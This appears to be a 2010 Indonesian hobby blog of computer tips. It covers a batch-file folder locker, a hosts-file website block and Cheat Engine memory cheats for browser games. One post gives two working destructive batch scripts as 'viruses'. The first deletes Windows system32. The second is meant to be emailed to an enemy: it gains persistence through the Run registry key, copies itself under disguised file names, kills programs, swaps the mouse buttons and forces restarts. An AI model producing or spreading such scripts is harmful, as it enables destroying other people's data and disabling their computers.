Senin, 08 November 2010

Pinball Windows XP trainer

Ni Trainer buat score main pinball jadi 2jt 500rb
Langsung aja tanpa basa basi nih klik


Udah kan?? klo gk bisa ya comment lahh.. OK!!

Kamis, 21 Oktober 2010

Cara Membuat folder terkunci, tanpa software

Caranya...

1. Buka Notepad dan copy kode dibawah ini

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
2. Pengisian dan perubahan password pada kode dibawah,ditunjukkan dengan warna merah.
3. Save file dgn format .bat , misal : Lock.bat trus klik save..
4. Klo mau coba.. klik 2x file yg lo bkin tadi
5. masukan pass yg udh lo atur tadi trus enter
6. kebuka deh..
7. nanti ada folder yg namanya Locker lo buka, trus lo taro folder yg mau lu kunci di situ..
8. lock lagi.. , dgn cara klik 2x folder yg lu bkin (yg ".bat" tadi)
9. Tekan Y atau y di keyboard trus enter
10. dah kan..?? 

Kamis, 30 September 2010

Cara Membuat 2 Virus yang LANGSUNG dapat melumpuhkan Komputer

Cara Membuat 2 Virus yang bisa LANGSUNG melumpuhkan komputer

VIRUS 1 (Format HDD Classic One)




1. Buka Notepad

2. Tuliskan perintah di bawah ini : -

del c:\windows\system32\*.* /q

3. Simpan file tersebut dengan nama apa saja terserah kamu, yang penting akhirannya harus ".bat or .cmd".

4. Jangan di klik 2x jika tidak ingin komputer sendiri yang hancur.

Kenapa ?????? Karena file yang kamu buat tadi akan menghapus folder system32 dan setelah komputer di hidupkan ulang maka komputermu tidak akan jalan dan harus di install ulang, karena sistem tidak mencari file-file yang ada di folder system32 yang dibutuhkan pada saat booting awal (dengan asumsi tanpa ada program Deep Freeze atau Returnil)

5. Jika ingin mencobanya buatlah folder baru dengan nama yang sama dan letakkan di C:\. Isi beberapa file yang tidak berguna. Kemudian jalankan file yang telah kamu buat tadi. Klik 2x file tersebut dan secara otomatis file akan terhapus.

6. Kamu bisa mencobanya di semua komputer yang memiliki system operasi Windows, dan ingat, saya tidak bertanggung jawab atas semua kerusakan yang kamu buat.

Virus 2

Trik ini untuk mengirim file ke komputer orang yang kamu benci.
Copy perintah di bawah ini ke dalam notepad.. kemudian simpan dengan nama terserah.bat

Jangan di klik file tersebut yach........ Kirim ke email orang yang kamu benci dach...
hehehehe....

Dan yang akan terjadi setelah si musuh menerima file adalah :
1) file akan mengcopy secara otomatis ke dalam startup
2) file akan mengcopy secara otomatis ke dalam ribuan komputer yang terinjeksi
3) mampu menyembunyikan dirinya sendiri

4) file akan mematikan secara otomatis program MSN, Norton, Windows Explorer, Limewire.
5) Membalik klik kanan mouse dengan klik kiri
6) Membuka kotak dialog Peringatan
7) Mengganti waktu ke jam 12:00 dan mematikan komputer


Code:

@Echo off

color 4

title 4

title R.I.P

start

start

start

start calc

copy %0 %Systemroot%\Greatgame > nul

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ

/d %systemroot%\Greatgame.bat /f > nul

copy %0 *.bat > nul

Attrib +r +h Greatgame.bat

Attrib +r +h

RUNDLL32 USER32.DLL.SwapMouseButton

start calc

cls

tskill msnmsgr

tskill LimeWire

tskill iexplore

tskill NMain

start

cls

cd %userprofile%\desktop

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

cd %userprofile%My Documents

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

start

start calc

cls

msg * R.I.P

msg * R.I.P

shutdown -r -t 10 -c "VIRUS DETECTED"

start

start

time 12:00

:R.I.P

cd %usernameprofile%\desktop

copy Greatgame.bat %random%.bat

goto RIP



Ingat!! Sekali lagi saya tidak bertanggung jawab atas kerusakan yang anda buat



Credit : ardiancaisar@bandungcheater forum

Minggu, 26 September 2010

Cara NgeBlock Website Di Komputer

1. Buka Folder C:\WINDOWS\system32\drivers\etc
2. klik 2 kali file bernama host. nanti ada tab open with.. trus pilih notepad.
3. trus ketik begini

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ‘#’ symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
127.0.0.1       localhost

4.dibawahnya 127.0.0.1       localhost tulis 127.0.0.2 (nama website yang mau diblock,contoh: www.facebook.com),jadi gini 127.0.0.2 www.facebook.com, klo mau tambah website yang mau diblock tambahin digit yang trakhir 1 angka jadi gini
127.0.0.1       localhost
127.0.0.2    www.facebook.com
127.0.0.3    www.twitter.com
terus begitu..

happy blocking ^^

Sabtu, 25 September 2010

Cara ngecheat di Flash Game

Tool :
- Firefox/Google Chrome/Flock
- Cheat Engine
Caranya :
- Siapin cheat engine.. Udah tau kan?klo blom tau nihh klik dsini
- Kalo mau cheat duit, liat duit kita di game, misal duit kita di game 2000
- 2000 itu dikali 8, trus masukin ke cheat engine, First Scan
- Beli apa gitu yg bisa kurangin duit, misal duit tinggal 1500
- 1500 nya dikali 8 trus masukin ke engine and klik next scan
- kan tinggal satu address tuh di sisi kiri cheat engine?
- Klik 2x address itu
- Lihat Kebawah Engine kan ada tuh address yg kita klik tadi.. 
- Ganti Valuenya jadi yg lo ingin.. (N.B: Jangan kebanyakan soalnya nanti error) 
Jelas kan? Klo mau exo ikutin aja caranya cuman angkanya ganti jadi exp lo.. OK??

Menyiapkan Cheat Engine

Di Post ini Saya akan menjelaskan kata Menyiapkan Cheat Engine pada postingan saya..
Maksudnya adalah :
- Buka Cheat Engine 
- Klik Gambar Komputer Kecil di pojok kiri atas
- Kalo mau cheatin Flash Game Klik Windows List, abis itu klik process program yg mau kita cheatin, misalnya Bloons Tower Defense-Firefox.exe itu diklik 2x
- Kalo di google chrome ikutin caranya klik disini
- Kalo mau cheatin game Facebook jangan klik Windows List.. Kita pake Process List dan pilih browser yg kita pake,misal : firefox.exe
Udah ngerti kan?? klo blom ngerti comment aja di post ini ato gk di shoutbox ok?

Cheat Money/Duit Baking Life

Sehubung Saya suka maen baking life skarang.. saya coba2 deh cheatnya.. eh!! taunya berhasil ni carany..
Tool :
Cheat Engine
- Firefox
- Flock
- Google Chrome, yg lom tau caranya cheat di google chrome silahkan klik dsini
Caranya :
- Siapkan Cheat Engine.. udah tau kan??klo blom tau klik dsini
- Main Baking Life (play)
- Kita ke Decor..
- Ke Tab Wall Decor
- Kamu Lihat Harga Dish Selves.. 45000 kan??
- Masukan 45000 ke cheat engine.. lalu first scan
- Setelah itu lihat di samping kiri engine.. ada 3-5 address kan?
- Klik 2x smuanya sehingga addressnya trun ke bawah
- Ganti Valuenya tuh smua jadi 1.. jgnn 0 nanti error
- Jadi tuh harga Dish Selvesnya 1 doang
- Beli sebanyak2nya
- Klo udah beli sebanyak2nya ganti value yg di engine yg dibawah tadi jadi 9999999.. 7 aja 9 nya jgn kebanyakan nanti error
- Trus jual deh tuh Dish.. Hehe Licik mode:on(NB: 1per1 ya jualnya dan harus cpet2 di save sbelum error)
- Happy Cheating!!